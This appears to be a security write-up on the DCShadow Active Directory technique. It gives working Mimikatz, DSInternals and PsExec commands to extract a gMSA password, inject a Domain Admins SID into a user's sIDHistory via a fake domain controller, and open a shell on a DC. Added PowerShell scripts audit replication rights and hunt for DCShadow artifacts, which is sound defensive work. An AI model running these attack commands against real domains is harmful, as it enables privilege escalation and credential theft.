**DCShadow** is a post-exploitation technique in which an attacker abuses compromised replication permissions to mimic a domain controller. By doing so, the adversary can push malicious changes into Active Directory (AD) with minimal logging, allowing for stealthy persistence, privilege escalation, or manipulation of AD data.

Mechanism:
DCShadow uses the Directory Replication Service protocol (MS-DRSR) to make an ordinary domain-joined machine look like a domain controller. The attacker creates an nTDSDSA object for that machine under CN=Sites,CN=Configuration, adds the GC/ and DRS-interface service principal names to its computer account, and starts an RPC endpoint that answers the replication calls a real DC would. The desired changes (for example a new value for a user's sIDHistory) are staged on this fake DC, and the attacker then calls the replication-add interface against a real DC so that it pulls and commits the changes as ordinary inbound replication. Registering the fake DC and triggering the replication both require high privilege; in practice this is a Domain Admin-level technique rather than an initial-access one.
Stealthiness:
Because the change reaches the real DC as inbound replication rather than as an LDAP write, the receiving DC does not raise the directory-object-modified event (5136) that a direct write would, and the modification carries the fake DC's identity in replication metadata. SIEM rules keyed on attribute-change events therefore may not flag it, which makes detection challenging. The registration itself is not silent, though: the attacking machine's computer account gains new SPNs (GC/... and the DRS interface GUID E3514235-4B06-11D1-AB04-00C04FC2DCD2, visible in event 4742 when computer account management auditing is on), and an nTDSDSA object is created and then deleted under CN=Sites,CN=Configuration (events 5137/5141 when Directory Service Changes auditing covers the Configuration partition). Those artifacts, plus an unexpected sIDHistory value, are the practical detection points.
Prerequisite:
Credentials for an account that can register a domain controller object and trigger replication. In practice this means Domain Admin or equivalent delegated rights on the Configuration partition plus the replication extended rights on the domain naming context. A Group Managed Service Account is one place such credentials may live if it was granted those rights; reading its password requires the current principal to be listed in the gMSA's PrincipalsAllowedToRetrieveManagedPassword, otherwise msDS-ManagedPassword is returned empty.
Example Commands (PowerShell):
Install-Module DSInternals -Force
Import-Module ActiveDirectory
# Read the managed-password blob; only works from a principal allowed to retrieve it
$GMSAPwd = (Get-ADServiceAccount GMSA1 -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
# Decode the blob with the DSInternals cmdlet and print the current cleartext password
ConvertFrom-ADManagedPasswordBlob $GMSAPwd | Select-Object -ExpandProperty CurrentPassword
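The defensive counterpart to the prerequisite above is knowing who in the domain already holds replication-related rights. The following PowerShell is an added example written for this page, not code from the original article or from any of the tools it mentions. It reads the ACL of the domain naming context through the ActiveDirectory module's AD: drive, reports every Allow ACE that grants GenericAll, all extended rights, or one of the five replication extended rights (identified by their fixed schema GUIDs), and flags identities outside an assumed baseline of built-in holders. The baseline pattern and the function name are assumptions to adjust per environment.

```powershell
# Added example, not part of the original page: list principals holding replication-related
# rights on the domain naming context and flag those outside an assumed default baseline.
Import-Module ActiveDirectory

# Schema GUIDs of the replication extended rights (fixed across all AD forests).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '1131f6ab-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Synchronize'
    '1131f6ac-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Manage-Topology'
}

# Assumed baseline: identities that hold these rights in a default domain. Tune for your forest.
$BaselinePattern = '^(BUILTIN\\Administrators|NT AUTHORITY\\SYSTEM|NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS|.*\\Domain Controllers|.*\\Enterprise Read-only Domain Controllers)$'

function Get-ReplicationRightHolders {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $rights = @()
        $genericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
        $extended   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
        if (($ace.ActiveDirectoryRights -band $genericAll) -eq $genericAll) {
            # Full control on the NC implies every replication right
            $rights += 'GenericAll'
        }
        elseif (($ace.ActiveDirectoryRights -band $extended) -ne 0) {
            if ($ace.ObjectType -eq [guid]::Empty) {
                # An ExtendedRight ACE with an empty ObjectType grants all extended rights
                $rights += 'All extended rights'
            }
            elseif ($ReplicationRights.ContainsKey($ace.ObjectType.ToString())) {
                $rights += $ReplicationRights[$ace.ObjectType.ToString()]
            }
        }

        foreach ($r in $rights) {
            [pscustomobject]@{
                Identity   = $ace.IdentityReference.Value
                Right      = $r
                Inherited  = $ace.IsInherited
                InBaseline = [bool]($ace.IdentityReference.Value -match $BaselinePattern)
            }
        }
    }
}

# Non-baseline holders sort to the top; each one is a DCSync/DCShadow candidate worth explaining.
Get-ReplicationRightHolders | Sort-Object InBaseline, Identity | Format-Table -AutoSize
```

Any identity reported with InBaseline = False (a gMSA, a service account, a synchronisation product) should have a documented reason for holding the right; a Get-Changes-All or GenericAll holder that nobody can account for is the credential the attack above goes looking for.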
Part 1: Elevate Privileges and Stage the AD Object Change
Using a tool like Mimikatz on a domain-joined host where the attacker is local administrator, the first instance elevates to SYSTEM (the fake DC's RPC server runs under this token and must stay open until the push completes) and stages the change to a replicated object. Here the attacker adds the domain's Domain Admins SID (RID 512) to a user's sIDHistory:
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::dcshadow /object:"CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory /value:S-1-5-21-441320023-234525631-506766575-512
Part 2: Push Changes to a Real Domain Controller
With the first instance still listening, the attacker opens a second Mimikatz instance under the compromised account (Domain Admin or equivalent) and triggers the real domain controller to replicate from the fake one. After the push Mimikatz unregisters the fake DC (removes the nTDSDSA object and the added SPNs), which is why the registration artifacts are short-lived. The command is passed as a single quoted argument so that Mimikatz treats it as one command:
.\mimikatz.exe "lsadump::dcshadow /push"
Result:
The pushed sIDHistory value S-1-5-21-441320023-234525631-506766575-512 is the domain's Domain Admins SID, so from the next logon BobT's access token carries Domain Admins without the account appearing in the group's member list. The adversary can then use tools like PsExec to authenticate as that account and move laterally, for example opening a shell on a domain controller:
Example Command:
.\PsExec.exe \\dc1.domain.com powershell.exe
hostname
The hostname command runs inside the remote PowerShell session and should return dc1, confirming the shell is on the domain controller.
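The procedure above leaves three kinds of evidence: a server object with an nTDSDSA child for a host that is not a domain controller (if caught before the cleanup), the 4742/5137/5141 events described under Stealthiness, and a populated sIDHistory on the target user. The following PowerShell is an added example written for this page, not code from the original article or from Mimikatz or DSInternals, and it hunts for all three. It assumes the ActiveDirectory module, read access to the Security log on the queried DC, and that Computer Account Management and Directory Service Changes auditing (with a SACL on the Configuration partition) are enabled; the function names and the 7-day window are the author's choices.

```powershell
# Added example, not part of the original page: three hunts for DCShadow artifacts.
Import-Module ActiveDirectory

function Get-RogueDsaObjects {
    # Every real DC has an nTDSDSA object at CN=NTDS Settings,CN=<server>,CN=Servers,CN=<site>,...
    # DCShadow creates one for the attacking host and deletes it after the push; one present for a
    # host that is not a known DC (in any domain of the forest) is a strong signal.
    $configNC = (Get-ADRootDSE).configurationNamingContext
    $knownDCs = foreach ($d in (Get-ADForest).Domains) { (Get-ADDomainController -Filter * -Server $d).Name }
    Get-ADObject -LDAPFilter '(objectClass=nTDSDSA)' -SearchBase "CN=Sites,$configNC" |
        ForEach-Object {
            # Second RDN of the nTDSDSA DN is the server object, CN=<hostname>
            $serverCN = (($_.DistinguishedName -split ',')[1]) -replace '^CN=', ''
            if ($serverCN -notin $knownDCs) {
                [pscustomobject]@{ Server = $serverCN; DsaDN = $_.DistinguishedName }
            }
        }
}

function Get-DCShadowEvents {
    param(
        [string]$ComputerName = (Get-ADDomain).PDCEmulator,
        [int]$Days = 7
    )
    # 4742 (computer account changed): DCShadow adds the GC/ SPN and the DRS RPC interface SPN
    # (GUID E3514235-4B06-11D1-AB04-00C04FC2DCD2) to the attacking host's computer account.
    # 5137 / 5141 (object created / deleted): the fake DC's nTDSDSA object appears and vanishes.
    # Both require the corresponding audit subcategories to be enabled; otherwise nothing is found.
    $filter = @{ LogName = 'Security'; Id = 4742, 5137, 5141; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object {
            ($_.Id -eq 4742 -and $_.Message -match 'GC/|E3514235-4B06-11D1-AB04-00C04FC2DCD2') -or
            ($_.Id -in 5137, 5141 -and $_.Message -match 'nTDSDSA')
        } |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
}

function Get-SidHistoryUsers {
    # A DCShadow push of sIDHistory leaves the attribute populated. In a domain with no completed
    # migrations any hit is suspicious; a value ending in -512 (Domain Admins) always is.
    Get-ADUser -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory |
        Select-Object SamAccountName,
            @{ n = 'SIDHistory';     e = { ($_.sIDHistory | ForEach-Object Value) -join ';' } },
            @{ n = 'ContainsRid512'; e = { [bool](($_.sIDHistory | ForEach-Object Value) -match '-512$') } }
}

Get-RogueDsaObjects | Format-Table -AutoSize
Get-DCShadowEvents  | Format-Table -AutoSize
Get-SidHistoryUsers | Format-Table -AutoSize
```

Run the event hunt against every DC, not only the PDC emulator: the 4742 and 5137/5141 events land on whichever DC processed the fake DC's registration, and the replicated sIDHistory change itself generates no 5136 anywhere, which is why the attribute query is the check that still works after the attacker's cleanup.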